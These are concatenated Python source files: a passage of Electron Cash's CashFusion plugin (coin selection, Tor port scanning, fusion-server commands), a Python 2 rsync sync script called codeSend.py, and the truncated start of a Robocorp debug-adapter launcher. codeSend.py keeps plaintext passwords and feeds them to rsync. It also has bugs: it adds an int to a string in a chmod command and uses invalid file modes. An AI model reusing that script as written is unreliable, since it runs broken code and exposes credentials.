i < 3 # must not have too many coins on the same address*
and not c['slp_token'] # must not be SLP
and not c['is_frozen_coin'] # must not be frozen
and (not c['coinbase'] or c['height'] <= mincbheight) # if coinbase -> must be mature coinbase
)
# * = We skip addresses with too many coins, since they take up lots
# of 'space' for consolidation. TODO: there is possibility of
# disruption here, if we get dust spammed. Need to deal with
# 'dusty' addresses by ignoring / consolidating dusty coins.
# Next, detect has_unconfirmed & has_coinbase:
if c['height'] <= 0:
# Unconfirmed -> Flag as not eligible and set the has_unconfirmed flag.
good = False
has_unconfirmed = True
# Update has_coinbase flag if not already set
has_coinbase = has_coinbase or c['coinbase']
if good:
eligible.append((addr,acoins))
else:
ineligible.append((addr,acoins))
return eligible, ineligible, int(sum_value), bool(has_unconfirmed), bool(has_coinbase)
def select_random_coins(wallet, fraction, eligible):
"""
Grab wallet coins with a certain probability, while also paying attention
to obvious linkages and possible linkages.
Returns list of list of coins (bucketed by obvious linkage).
"""
# First, we want to bucket coins together when they have obvious linkage.
# Coins that are linked together should be spent together.
# Currently, just look at address.
addr_coins = eligible
random.shuffle(addr_coins)
# While fusing we want to pay attention to semi-correlations among coins.
# When we fuse semi-linked coins, it increases the linkage. So we try to
# avoid doing that (but rarely, we just do it anyway :D).
# Currently, we just look at all txids touched by the address.
# (TODO this is a disruption vector: someone can spam multiple fusions'
# output addrs with massive dust transactions (2900 outputs in 100 kB)
# that make the plugin think that all those addresses are linked.)
result_txids = set()
result = []
num_coins = 0
for addr, acoins in addr_coins:
if num_coins >= DEFAULT_MAX_COINS:
break
elif num_coins + len(acoins) > DEFAULT_MAX_COINS:
continue
# For each bucket, we give a separate chance of joining.
if random.random() > fraction:
continue
# Semi-linkage check:
# We consider all txids involving the address, historical and current.
ctxids = {txid for txid, height in wallet.get_address_history(addr)}
collisions = ctxids.intersection(result_txids)
# Note each collision gives a separate chance of discarding this bucket.
if random.random() > KEEP_LINKED_PROBABILITY**len(collisions):
continue
# OK, no problems: let's include this bucket.
num_coins += len(acoins)
result.append(acoins)
result_txids.update(ctxids)
if not result:
# nothing was selected, just try grabbing first nonempty bucket
try:
res = next(coins for addr,coins in addr_coins if coins)
result = [res]
except StopIteration:
# all eligible buckets were cleared.
pass
return result
def get_target_params_1(wallet, wallet_conf, active_autofusions, eligible):
""" WIP -- TODO: Rename this function. """
wallet_conf = Conf(wallet)
mode = wallet_conf.fusion_mode
# Note each fusion 'consumes' a certain number of coins by freezing them,
# so that the next fusion has less eligible coins to work with. So each
# call to this may see a smaller n_buckets.
n_buckets = len(eligible)
if mode == 'normal':
return max(2, round(n_buckets / DEFAULT_MAX_COINS)), False
elif mode == 'fan-out':
return max(4, math.ceil(n_buckets / (COIN_FRACTION_FUDGE_FACTOR*0.65))), False
elif mode == 'consolidate':
if n_buckets < MIN_TX_COMPONENTS - CONSOLIDATE_MAX_OUTPUTS:
# Too few eligible buckets to make an effective consolidation.
return 0, False
# In the latter stages of consolidation, only do one fusion
# at a time with all-confirmed rule, to make sure each fusion's outputs
# may be consumed by the subsequent one.
# To avoid weird loops, try to calculate the TOTAL number of coins
# that are either 1) eligible or 2) being fused. (Should stay constant
# as fusions are added/cancelled)
n_coins = sum(len(acoins) for addr,acoins in eligible)
n_total = n_coins + sum(len(getattr(f, 'inputs', ())) for f in active_autofusions)
if n_total < DEFAULT_MAX_COINS*3:
return 1, True
# If coins are scarce then don't make more autofusions unless we
# have none.
if n_buckets < DEFAULT_MAX_COINS*2:
return 1, False
# We still have lots of coins left, so request another autofusion.
return MAX_AUTOFUSIONS_PER_WALLET, False
else: # 'custom'
target_num_auto = wallet_conf.queued_autofuse
confirmed_only = wallet_conf.autofuse_confirmed_only
return int(target_num_auto), bool(confirmed_only)
def get_target_params_2(wallet_conf, sum_value):
""" WIP -- TODO: Rename this function. """
mode = wallet_conf.fusion_mode
fraction = 0.1
if mode == 'custom':
# Determine the fraction that should be used
select_type, select_amount = wallet_conf.selector
if select_type == 'size' and int(sum_value) != 0:
# user wants to get a typical output of this size (in sats)
fraction = COIN_FRACTION_FUDGE_FACTOR * select_amount / sum_value
elif select_type == 'count' and int(select_amount) != 0:
# user wants this number of coins
fraction = COIN_FRACTION_FUDGE_FACTOR / select_amount
elif select_type == 'fraction':
# user wants this fraction
fraction = select_amount
# note: fraction at this point could be <0 or >1 but doesn't matter.
elif mode == 'consolidate':
fraction = 1.0
elif mode == 'normal':
fraction = 0.5
elif mode == 'fan-out':
fraction = 0.1
return fraction
class FusionPlugin(BasePlugin):
fusion_server = None
active = True
_run_iter = 0
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs) # gives us self.config
# Do an initial check on the tor port
self.tor_port_good = None
t = threading.Thread(name = 'Fusion-scan_torport_initial', target = self.scan_torport)
t.start()
# quick lock for the following two WeakKeyDictionary variables
# Locking order wallet.lock -> plugin.lock.
self.lock = threading.Lock()
self.fusions = weakref.WeakKeyDictionary()
self.autofusing_wallets = weakref.WeakKeyDictionary() # wallet -> password
self.registered_network_callback = False
self.t_last_net_ok = time.monotonic()
self.remote_donation_address: str = '' # optionally announced by the remote server in 'serverhello' message
if tuple(self.config.get('cashfusion_server', ())) == ('cashfusion.electroncash.dk', 8787, False):
# User's config has the old default non-SSL server. If we see this,
# just wipe the config key so that the new default is used.
# But only reset once, after that let them go back if that is what
# they truly desire.
if self.config.get('cashfusion_server_defaultresetted', 0) < 1:
self.config.set_key('cashfusion_server', None)
self.config.set_key('cashfusion_server_defaultresetted', 1)
def on_close(self,):
super().on_close()
self.stop_fusion_server()
if self.registered_network_callback:
self.registered_network_callback = False
network = Network.get_instance()
if network:
network.unregister_callback(self.on_wallet_transaction)
self.active = False
def fullname(self):
return 'CashFusion'
def description(self):
return _("CashFusion Protocol")
def is_available(self):
return True
def set_remote_donation_address(self, address : str):
self.remote_donation_address = ((isinstance(address, str) and address) or '')[:100]
def get_server(self, ):
return Global(self.config).server
def set_server(self, host, port, ssl):
gconf = Global(self.config)
old = gconf.server
gconf.server = (host, port, ssl) # type/sanity checking done in setter
if old != gconf.server:
self.on_server_changed()
def get_torhost(self):
if self.has_auto_torport():
return Global.Defaults.TorHost
else:
return Global(self.config).tor_host
def set_torhost(self, host):
''' host should be a valid hostname '''
if not host: return
Global(self.config).tor_host = host
def has_auto_torport(self, ):
return Global(self.config).tor_port_auto
def get_torport(self, ):
''' Retreive either manual port or autodetected port; may return None
if 'auto' mode and no Tor port has been autodetected. (this is non-blocking) '''
if self.has_auto_torport():
return self.tor_port_good
else:
return Global(self.config).tor_port_manual
def set_torport(self, port):
# port may be 'auto' or 'manual' or an int
gconf = Global(self.config)
if port == 'auto':
gconf.tor_port_auto = True
return
else:
gconf.tor_port_auto = False
if port == 'manual':
return # we're simply going to use whatever manual port was already set
assert isinstance(port, int)
gconf.tor_port_manual = port
def scan_torport(self, ):
''' Scan for Tor proxy on either the manual port or on a series of
automatic ports. This is blocking. Returns port if it's up, or None if
down / can't find. '''
host = self.get_torhost()
if self.has_auto_torport():
portlist = []
network = Network.get_instance()
if network:
tc = network.tor_controller
if tc and tc.is_enabled() and tc.active_socks_port:
portlist.append(tc.active_socks_port)
portlist.extend(TOR_PORTS)
else:
portlist = [ Global(self.config).tor_port_manual ]
for port in portlist:
if is_tor_port(host, port):
self.tor_port_good = port
break
else:
self.tor_port_good = None
return self.tor_port_good
def on_server_changed(self):
""" When the server is changed, we stop all extant fusions that are not
already 'running' in order to allow for the new change to take effect
immediately. """
self.remote_donation_address = ''
self.stop_all_fusions('Server changed', not_if_running=True)
def get_all_fusions(self, ):
""" Return all still-live fusion objects that have been created using .start_fusion(),
including autofusions and any other fusions. """
with self.lock:
fusions_and_times = list(self.fusions.items())
fusions_and_times.sort(key=lambda x:x[1])
return [f for f,t in fusions_and_times]
def stop_all_fusions(self, reason, *, not_if_running=True):
with self.lock:
for f in list(self.fusions):
f.stop(reason, not_if_running = not_if_running)
@staticmethod
def stop_autofusions(wallet, reason, *, not_if_running=True):
with wallet.lock:
try:
fusion_weakset = wallet._fusions_auto
except AttributeError:
return []
running = []
for f in list(fusion_weakset):
if not f.is_alive():
fusion_weakset.discard(f)
continue
f.stop(reason, not_if_running = not_if_running)
if f.status[0] == 'running':
running.append(f)
return running
def disable_autofusing(self, wallet):
with self.lock:
self.autofusing_wallets.pop(wallet, None)
Conf(wallet).autofuse = False
return self.stop_autofusions(wallet, 'Autofusing disabled', not_if_running=True)
def enable_autofusing(self, wallet, password):
if password is None and wallet.has_password():
raise InvalidPassword()
else:
wallet.check_password(password)
with self.lock:
self.autofusing_wallets[wallet] = password
Conf(wallet).autofuse = True
def is_autofusing(self, wallet):
with self.lock:
return (wallet in self.autofusing_wallets)
def add_wallet(self, wallet, password=None):
''' Attach the given wallet to fusion plugin, allowing it to be used in
fusions with clean shutdown. Also start auto-fusions for wallets that want
it (if no password).
'''
with wallet.lock:
# Generate wallet._fusions and wallet._fusions_auto; these must
# only be accessed with wallet.lock held.
# all fusions relating to this wallet, either as source or target
# or both.
wallet._fusions = weakref.WeakSet()
# fusions that were auto-started.
wallet._fusions_auto = weakref.WeakSet()
# caache: stores a map of txid -> fusion_depth (or False if txid is not a fuz tx)
wallet._cashfusion_is_fuz_txid_cache = dict()
# cache: stores a map of address -> fusion_depth if the address has fuz utxos
wallet._cashfusion_address_cache = dict()
# all accesses to the above must be protected by wallet.lock
if Conf(wallet).autofuse:
try:
self.enable_autofusing(wallet, password)
except InvalidPassword:
self.disable_autofusing(wallet)
if not self.registered_network_callback and wallet.network:
wallet.network.register_callback(self.on_wallet_transaction, ['new_transaction'])
self.registered_network_callback = True
def remove_wallet(self, wallet):
''' Detach the provided wallet; returns list of active fusion threads. '''
with self.lock:
self.autofusing_wallets.pop(wallet, None)
fusions = ()
try:
with wallet.lock:
fusions = list(wallet._fusions)
del wallet._fusions
del wallet._fusions_auto
del wallet._cashfusion_is_fuz_txid_cache
del wallet._cashfusion_address_cache
except AttributeError:
pass
return [f for f in fusions if f.is_alive()]
def start_fusion(self, source_wallet, password, coins, target_wallet = None, max_outputs = None, inactive_timeout = None):
""" Create and start a new Fusion object with current server/tor settings.
Both source_wallet.lock and target_wallet.lock must be held.
FIXME: this condition is begging for a deadlock to happen when the two wallets
are different. Need to find a better way if inter-wallet fusing actually happens.
"""
if target_wallet is None:
target_wallet = source_wallet # self-fuse
assert can_fuse_from(source_wallet)
assert can_fuse_to(target_wallet)
host, port, ssl = self.get_server()
if host == 'localhost':
# as a special exemption for the local fusion server, we don't use Tor.
torhost = None
torport = None
else:
torhost = self.get_torhost()
torport = self.get_torport()
if torport is None:
torport = self.scan_torport() # may block for a very short time ...
if torport is None:
self.notify_server_status(False, ("failed", _("Invalid Tor proxy or no Tor proxy found")))
raise RuntimeError("can't find tor port")
fusion = Fusion(self, target_wallet, host, port, ssl, torhost, torport)
fusion.add_coins_from_wallet(source_wallet, password, coins)
fusion.max_outputs = max_outputs
with self.lock:
fusion.start(inactive_timeout = inactive_timeout)
self.fusions[fusion] = time.time()
target_wallet._fusions.add(fusion)
source_wallet._fusions.add(fusion)
return fusion
def thread_jobs(self, ):
return [self]
def run(self, ):
# this gets called roughly every 0.1 s in the Plugins thread; downclock it to 5 s.
run_iter = self._run_iter + 1
if run_iter < 50:
self._run_iter = run_iter
return
else:
self._run_iter = 0
if not self.active:
return
dont_start_fusions = False
network = Network.get_instance()
if network and network.is_connected():
self.t_last_net_ok = time.monotonic()
else:
# Cashfusion needs an accurate picture of the wallet's coin set, so
# that we don't reuse addresses and we don't submit already-spent coins.
# Currently the network is not synced so we won't start new fusions.
dont_start_fusions = True
if time.monotonic() - self.t_last_net_ok > 31:
# If the network is disconnected for an extended period, we also
# shut down all waiting fusions. We can't wait too long because
# one fusion might succeed but then enter the 'time_wait' period
# where it is waiting to see the transaction on the network.
# After 60 seconds it gives up and then will unreserve addresses,
# and currently-waiting fusions would then grab those addresses when
# they begin rounds.
self.stop_all_fusions('Lost connection to Electron Cash server', not_if_running = True)
return
# Snapshot of autofusing list; note that remove_wallet may get
# called on one of the wallets, after lock is released.
with self.lock:
wallets_and_passwords = list(self.autofusing_wallets.items())
torcount = limiter.count
if torcount > AUTOFUSE_RECENT_TOR_LIMIT_UPPER:
# need tor cooldown, stop the waiting autofusions
for wallet, password in wallets_and_passwords:
self.stop_autofusions(wallet, 'Tor cooldown', not_if_running = True)
return
if torcount > AUTOFUSE_RECENT_TOR_LIMIT_LOWER:
# no urgent need to stop fusions, but don't queue up any more.
dont_start_fusions = True
for wallet, password in wallets_and_passwords:
with wallet.lock:
if not hasattr(wallet, '_fusions'):
continue
if not wallet.up_to_date:
# We want a good view of the wallet so we know which coins
# are unspent and confirmed, and we know which addrs are
# used. Note: this `continue` will bypass the potential .stop()
# below.
continue
for f in list(wallet._fusions_auto):
if not f.is_alive():
wallet._fusions_auto.discard(f)
active_autofusions = list(wallet._fusions_auto)
if dont_start_fusions and not active_autofusions:
continue
num_auto = len(active_autofusions)
wallet_conf = Conf(wallet)
eligible, ineligible, sum_value, has_unconfirmed, has_coinbase = select_coins(wallet)
target_num_auto, confirmed_only = get_target_params_1(wallet, wallet_conf, active_autofusions, eligible)
if confirmed_only and has_unconfirmed:
for f in list(wallet._fusions_auto):
f.stop('Wallet has unconfirmed coins... waiting.', not_if_running = True)
continue
fuse_depth = Conf(wallet).fuse_depth
if fuse_depth > 0:
sum_eligible_values = 0
sum_fuz_values = 0
for eaddr, ecoins in eligible:
ecoins_value = sum(ecoin['value'] for ecoin in ecoins)
sum_eligible_values += ecoins_value
if self.is_fuz_address(wallet, eaddr, require_depth=fuse_depth-1):
sum_fuz_values += ecoins_value
if (sum_eligible_values != 0) and (sum_fuz_values / sum_eligible_values >= FUSE_DEPTH_THRESHOLD):
continue
if not dont_start_fusions and num_auto < min(target_num_auto, MAX_AUTOFUSIONS_PER_WALLET):
# we don't have enough auto-fusions running, so start one
fraction = get_target_params_2(wallet_conf, sum_value)
chosen_buckets = select_random_coins(wallet, fraction, eligible)
coins = [c for l in chosen_buckets for c in l]
if not coins:
self.print_error("auto-fusion skipped due to lack of coins")
continue
if wallet_conf.fusion_mode == 'consolidate':
max_outputs = CONSOLIDATE_MAX_OUTPUTS
if len(chosen_buckets) < (MIN_TX_COMPONENTS - max_outputs):
self.print_error("consolidating auto-fusion skipped due to lack of unrelated coins")
continue
else:
max_outputs = None
try:
f = self.start_fusion(wallet, password, coins, max_outputs = max_outputs, inactive_timeout = AUTOFUSE_INACTIVE_TIMEOUT)
self.print_error("started auto-fusion")
except RuntimeError as e:
self.print_error(f"auto-fusion skipped due to error: {e}")
return
wallet._fusions_auto.add(f)
def start_fusion_server(self, network, bindhost, port, upnp = None, announcehost = None, donation_address = None):
if self.fusion_server:
raise RuntimeError("server already running")
donation_address = (isinstance(donation_address, Address) and donation_address) or None
self.fusion_server = FusionServer(self.config, network, bindhost, port, upnp = upnp, announcehost = announcehost, donation_address = donation_address)
self.fusion_server.start()
return self.fusion_server.host, self.fusion_server.port
def stop_fusion_server(self):
try:
self.fusion_server.stop('server stopped by operator')
self.fusion_server = None
except Exception:
pass
def update_coins_ui(self, wallet):
''' Default implementation does nothing. Qt plugin subclass overrides
this, which sends a signal to the main thread to update the coins tab.
This is called by the Fusion thread (in its thread context) when it
freezes & unfreezes coins. '''
def notify_server_status(self, b, tup : tuple = None):
''' The Qt plugin subclass implements this to tell the GUI about bad
servers. '''
if not b: self.print_error("notify_server_status:", b, str(tup))
@hook
def donation_address(self, window) -> Optional[Tuple[str,Address]]:
''' Plugin API: Returns a tuple of (description, Address) or None. This
is the donation address that we as a client got from the remote server
(as opposed to the donation address we announce if we are a server). '''
if self.remote_donation_address and Address.is_valid(self.remote_donation_address):
return (self.fullname() + " " + _("Server") + ": " + self.get_server()[0], Address.from_string(self.remote_donation_address))
@staticmethod
def wallet_can_fuse(wallet) -> bool:
return can_fuse_from(wallet) and can_fuse_to(wallet)
@staticmethod
def is_fuz_coin(wallet, coin, *, require_depth=0) -> Optional[bool]:
""" Returns True if the coin in question is definitely a CashFusion coin (uses heuristic matching),
or False if the coin in question is not from a CashFusion tx. Returns None if the tx for the coin
is not (yet) known to the wallet (None == inconclusive answer, caller may wish to try again later).
If require_depth is > 0, check recursively; will return True if all ancestors of the coin
up to require_depth are also CashFusion transactions belonging to this wallet.
Precondition: wallet must be a fusion wallet. """
require_depth = min(max(0, require_depth), 900) # paranoia: clamp to [0, 900]
cache = wallet._cashfusion_is_fuz_txid_cache
assert isinstance(cache, dict)
txid = coin['prevout_hash']
# check cache, if cache hit, return answer and avoid the lookup below
cached_val = cache.get(txid, None)
if cached_val is not None:
# cache stores either False, or a depth for which the predicate is true
if cached_val is False:
return False
elif cached_val >= require_depth:
return True
my_addresses_seen = set()
def check_is_fuz_tx():
tx = wallet.transactions.get(txid, None)
if tx is None:
# Not found in wallet.transactions so its fuz status is as yet "unknown". Indicate this.
return None
inputs = tx.inputs()
outputs = tx.outputs()
# We expect: OP_RETURN (4) FUZ\x00
fuz_prefix = bytes((OpCodes.OP_RETURN, len(Protocol.FUSE_ID))) + Protocol.FUSE_ID
# Step 1 - does it have the proper OP_RETURN lokad prefix?
for typ, dest, amt in outputs:
if amt == 0 and typ == TYPE_SCRIPT and dest.script.startswith(fuz_prefix):
break # lokad found, proceed to Step 2 below
else:
# Nope, lokad prefix not found
return False
# Step 2 - are at least 1 of the inputs from me? (DoS prevention measure)
for inp in inputs:
inp_addr = inp.get('address', None)
if inp_addr is not None and (inp_addr in my_addresses_seen or wallet.is_mine(inp_addr)):
my_addresses_seen.add(inp_addr)
if require_depth == 0:
return True # This transaction is a CashFusion tx
# [Optional] Step 3 - Check if all ancestors up to required_depth are also fusions
if not FusionPlugin.is_fuz_coin(wallet, inp, require_depth=require_depth-1):
# require_depth specified and not all required_depth parents were CashFusion
return False
if my_addresses_seen:
# require_depth > 0: This tx + all wallet ancestors were CashFusion transactions up to require_depth
return True
# Failure -- this tx has the lokad but no inputs are "from me".
wallet.print_error(f"CashFusion: txid \"{txid}\" has a CashFusion-style OP_RETURN but none of the "
f"inputs are from this wallet. This is UNEXPECTED!")
return False
# /check_is_fuz_tx
answer = check_is_fuz_tx()
if isinstance(answer, bool):
# maybe cache the answer if it's a definitive answer True/False
if require_depth == 0:
# we got an answer for this coin's tx itself
if not answer:
cache[txid] = False
elif not cached_val:
# only set the cached val if it was missing previously, to avoid overwriting higher values
cache[txid] = 0
elif answer and (cached_val is None or cached_val < require_depth):
# indicate true up to the depth we just checked
cache[txid] = require_depth
elif not answer and isinstance(cached_val, int) and cached_val >= require_depth:
# this should never happen
wallet.print_error(f"CashFusion: WARNING txid \"{txid}\" has inconsistent state in "
f"the _cashfusion_is_fuz_txid_cache")
if answer:
# remember this address as being a "fuzed" address and cache the positive reply
cache2 = wallet._cashfusion_address_cache
assert isinstance(cache2, dict)
addr = coin.get('address', None)
if addr:
my_addresses_seen.add(addr)
for addr in my_addresses_seen:
depth = cache2.get(addr, None)
if depth is None or depth < require_depth:
cache2[addr] = require_depth
return answer
@classmethod
def get_coin_fuz_count(cls, wallet, coin, *, require_depth=0):
""" Will return a fuz count for a coin. Unfused or unknown coins have count 0, coins
that appear in a fuz tx have count 1, coins whose wallet parent txs are all fuz are 2, 3, etc
depending on how far back the fuz perdicate is satisfied.
This function only checks up to 10 ancestors deep so tha maximum return value is 10.
Precondition: wallet must be a fusion wallet. """
require_depth = min(max(require_depth, 0), MAX_LIMIT_FUSE_DEPTH - 1)
cached_ct = wallet._cashfusion_is_fuz_txid_cache.get(coin['prevout_hash'])
if isinstance(cached_ct, int) and cached_ct >= require_depth:
return cached_ct + 1
ret = 0
for i in range(cached_ct or 0, require_depth + 1, 1):
ret = i
if not cls.is_fuz_coin(wallet, coin, require_depth=i):
break
return ret
@classmethod
def is_fuz_address(cls, wallet, address, *, require_depth=0):
""" Returns True if address contains any fused UTXOs.
Optionally, specify require_depth, in which case True is returned
if any UTXOs for this address are sufficiently fused to the
specified depth.
If you want thread safety, caller must hold wallet locks.
Precondition: wallet must be a fusion wallet. """
assert isinstance(address, Address)
require_depth = max(require_depth, 0)
cache = wallet._cashfusion_address_cache
assert isinstance(cache, dict)
cached_val = cache.get(address, None)
if cached_val is not None and cached_val >= require_depth:
return True
utxos = wallet.get_addr_utxo(address)
for coin in utxos.values():
if cls.is_fuz_coin(wallet, coin, require_depth=require_depth):
if cached_val is None or cached_val < require_depth:
cache[address] = require_depth
return True
return False
@staticmethod
def on_wallet_transaction(event, *args):
""" Network object callback. Always called in the Network object's thread. """
if event == 'new_transaction':
# if this is a fusion wallet, clear the is_fuz_address() cache when new transactions arrive
# since we may have spent some utxos and so the cache needs to be invalidated
wallet = args[1]
if hasattr(wallet, '_cashfusion_address_cache'):
with wallet.lock:
wallet._cashfusion_address_cache.clear()
@daemon_command
def fusion_server_start(self, daemon, config):
# Usage:
# ./electron-cash daemon fusion_server_start <bindhost>(,<announcehost>) <port>
# ./electron-cash daemon fusion_server_start <bindhost>(,<announcehost>) <port> upnp
# ./electron-cash daemon fusion_server_start <bindhost>(,<announcehost>) <port> <donation_addr>
# ./electron-cash daemon fusion_server_start <bindhost>(,<announcehost>) <port> upnp <donation_addr>
# e.g.:
# ./electron-cash daemon fusion_server_start 0.0.0.0,myfusionserver.com 8787 upnp bitcoincash:qpxiweuqoiweweqeweqw
#
# The main server port will be bound on <bindhost>:<port>.
# Covert submissions will be bound on <bindhost>:<ephemeral_port> (the port is chosen by the OS)
# The main server will tell clients to connect to <announcehost>:<ephemeral_port> .
# The default announcehost is based on an autodetection system, which may not work for some server networking setups.
network = daemon.network
if not network:
return "error: cannot run fusion server without an SPV server connection"
def invoke(firstarg = '0.0.0.0', sport='8787', upnp_str = None, addr_str = None):
bindhost, *extrahosts = firstarg.split(',')
if len(extrahosts) > 1:
raise Exception("too many hosts")
elif len(extrahosts) == 1:
[announcehost,] = extrahosts
else:
announcehost = None
port = int(sport)
pnp = get_upnp() if upnp_str == 'upnp' else None
if not pnp and not addr_str:
# third arg may be addr_str, so swap the args
addr_str = upnp_str
upnp_str = None
addr = None
if addr_str:
assert Address.is_valid(addr_str), "Invalid donation address specified"
addr = Address.from_string(addr_str)
return self.start_fusion_server(network, bindhost, port, upnp = pnp, announcehost = announcehost, donation_address = addr)
try:
host, port = invoke(*config.get('subargs', ()))
except Exception as e:
import traceback, sys; traceback.print_exc(file=sys.stderr)
return f'error: {str(e)}'
return (host, port)
@daemon_command
def fusion_server_stop(self, daemon, config):
self.stop_fusion_server()
return 'ok'
@daemon_command
def fusion_server_status(self, daemon, config):
if not self.fusion_server:
return "fusion server not running"
return dict(poolsizes = {t: len(pool.pool) for t,pool in self.fusion_server.waiting_pools.items()})
@daemon_command
def fusion_server_fuse(self, daemon, config):
if self.fusion_server is None:
return
subargs = config.get('subargs', ())
if len(subargs) != 1:
return "expecting tier"
tier = int(subargs[0])
num_clients = self.fusion_server.start_fuse(tier)
return num_clients
|
codeSend.py
|
#coding=utf-8
import os
import json
import gevent
import sys,codecs,subprocess,pexpect,time,threading
reload( sys )
sys.setdefaultencoding('utf-8')
#强制规范必要文件
def mkfile():
f={'./exclude.txt':666,'./config.json':666}
for i,v in f.items():
if os.path.exists(i)==False:
open(i,'wa+').close()
os.system("chmod "+v+" ./exclude.txt")
#打开配置文件
def openConfig(path):
try:
config = codecs.open(path,'r','utf-8');
data=config.read()
data={} if data=="" else json.loads(data)
config.close()
except Exception as e:
print e
data={}
return data
#打开日志缓存
def openOld(path):
try:
f_old = codecs.open(path,'r','utf-8');
data=f_old.read()
data={} if data=="" else json.loads(data)
f_old.close()
except Exception as e:
print e
data={}
return data
#保存日志缓存
def saveOld(path,data):
try:
f_old = codecs.open(path,'wr+','utf-8')
data=json.dumps(data)
f_old.write(data)
data=True
f_old.close()
except Exception as e:
print e
data=False
return data
#执行复制操作
def copys(paths,i,v):
#for i,v in dispath.items():
bakupPath=v[2]+'bakup/'
old_path=paths
disPath_one=v[2] if i=='/' else v[0]+"@"+i+":"+v[2]
#发送文件
cmd="rsync --progress -uabrz --partial --log-file=./rsync.log --force --delete --delete-excluded="+bakupPath+"/* --backup-dir="+bakupPath+" "+old_path+" "+disPath_one+" --exclude-from=./exclude.txt "
try:
child = pexpect.spawn(cmd)
if i!='/':
child.expect(['password:'])
child.sendline(v[1])
#child.interact()
while(True):
child.expect('to-check=')
datas=child.readline()
one=datas.split('/')[0]
two=datas.split('/')[1].split(')')[0]
pre=100-int(float(one) / float(two)*100)
#sys.stdout.flush()
sys.stdout.write('源目录'+paths+'----->'+disPath_one+'----正在同步,进度{0}%\r'.format(pre))
if pre==100:
raise Exception("源目录"+paths+"----->"+disPath_one+"----同步完成,进度{0}%".format(100))
except Exception as e:
#print e
if type(e)==pexpect.exceptions.EOF:
#sys.stdout.flush()
sys.stdout.write("源目录"+paths+"----->"+disPath_one+"----同步完成,进度{0}%\r\n".format(100))
else:
#sys.stdout.flush()
sys.stdout.write(str(e)+"\r\n")
child.close()
#开始遍历文件和目录,返回修改时间
def getMemus(path):
f_new={}
f_old=openOld('./log.txt')
f=[]
try:
for root, dirs, files in os.walk(path, topdown=False):
for name in files:
contentPath=os.path.join(root, name)
f_new.update({contentPath:os.stat(contentPath).st_mtime})
if f_old.has_key(contentPath) == False or f_old[contentPath] != os.stat(contentPath).st_mtime:
f.append(contentPath)
print saveOld('./log.txt',f_new)
except Exception as e:
print e
f=[]
return f
if __name__ =='__main__':
if '--help' in sys.argv or '-h' in sys.argv:
print "需要一个参数,第一个参数为源目录"
elif len(sys.argv)<2:
raise Exception("需要一个参数,第一个参数为源目录")
configs=openConfig('./config.json')
testPath=sys.argv[1]
mkfile()
'''
#协程异步处理#copys(testPath,configs)
tmp=[]
for i,v in configs.items():
tmp.append(gevent.spawn(copys,testPath,i,v))
gevent.joinall(tmp)
'''
tmp=[]
for i,v in configs.items():
t =threading.Thread(target=copys,args=(testPath,i,v,))
tmp.append(t)
for t in tmp:
t.start()
t.join()
|
launch_process.py
|
# Original work Copyright Fabio Zadrozny (EPL 1.0)
# See ThirdPartyNotices.txt in the project root for license information.
# All modifications Copyright (c) Robocorp Technologies Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
from robocorp_ls_core.robotframework_log import get_logger
import itertools
import os.path
import threading
from robocorp_ls_core.protocols import IConfig
from typing import Optional, List, Callable
from pathlib import Path
log = get_logger(__name__)
def _read_stream(stream, on_line, category):
try:
while True:
output = stream.readline()
if len(output) == 0:
log.debug("Finished reading stream: %s.\n" % (category,))
break
output = output.decode("utf-8", errors="replace")
on_line(output, category)
except:
log.exception("Error")
def _notify_on_exited_pid(on_exit, pid):
try:
from robocorp_ls_core.basic import is_process_alive
import time
log.debug("Waiting for pid to exit (_notify_on_exited_pid).")
while True:
if not is_process_alive(pid):
break
time.sleep(0.5)
log.debug("pid exited (_notify_on_exited_pid).")
on_exit()
except:
log.exception("Error")
class _DefaultConfigurationProvider(object):
def __init__(self, config: IConfig):
self.config = config
class LaunchProcess(object):
__slots__ = [
"_valid",
"_cmdline",
"_terminal",
"_popen",
"_weak_debug_adapter_comm",
"__weakref__",
"_cwd",
"_run_in_debug_mode",
"_debug_adapter_robot_target_comm",
"_launch_response",
"_next_seq",
"_track_process_pid",
"_sent_terminated",
"_env",
"_rcc_config_location",
"_on_exit_callbacks",
]
def __init__( # pylint: disable=return-in-init
self,
request,
launch_response,
debug_adapter_comm,
rcc_config_location: Optional[str],
) -> None:
"""
:param LaunchRequest request:
:param LaunchResponse launch_response:
"""
import weakref
from robocorp_ls_core.basic import as_str
from robocorp_code_debug_adapter.constants import VALID_TERMINAL_OPTIONS
from robocorp_code_debug_adapter.constants import TERMINAL_NONE
from robocorp_ls_core.robotframework_log import get_log_level
from robocorp_code.rcc import Rcc
from robocorp_ls_core.config import Config
from robocorp_ls_core import yaml_wrapper
from robocorp_ls_core.protocols import ActionResult
from robocorp_code.protocols import IRobotYamlEnvInfo
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import OutputEvent
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import OutputEventBody
self._weak_debug_adapter_comm = weakref.ref(debug_adapter_comm)
self._valid = True
self._cmdline = []
self._popen = None
self._launch_response = launch_response
self._next_seq = partial(next, itertools.count(0))
self._track_process_pid = None
self._sent_terminated = threading.Event()
self._rcc_config_location = rcc_config_location
self._on_exit_callbacks: List[Callable] = []
def mark_invalid(message):
launch_response.success = False
launch_response.message = message
self._valid = False
robot_yaml = request.arguments.kwargs.get("robot")
self._terminal = request.arguments.kwargs.get("terminal", TERMINAL_NONE)
if self._terminal != TERMINAL_NONE:
# We don't currently support the integrated terminal because we don't
# have an easy way to get the launched process pid in this way.
return mark_invalid(
f"Only 'terminal=none' is supported. Found terminal: {self._terminal}"
)
task_name = request.arguments.kwargs.get("task", "")
args = request.arguments.kwargs.get("args") or []
if not isinstance(args, list):
args = [args]
args = [str(arg) for arg in args]
env = {}
request_env = request.arguments.kwargs.get("env")
if isinstance(request_env, dict) and request_env:
env.update(request_env)
env = dict(((as_str(key), as_str(value)) for (key, value) in env.items()))
self._env = env
self._run_in_debug_mode = not request.arguments.noDebug
if self._terminal not in VALID_TERMINAL_OPTIONS:
return mark_invalid(
"Invalid terminal option: %s (must be one of: %s)"
% (self._terminal, VALID_TERMINAL_OPTIONS)
)
try:
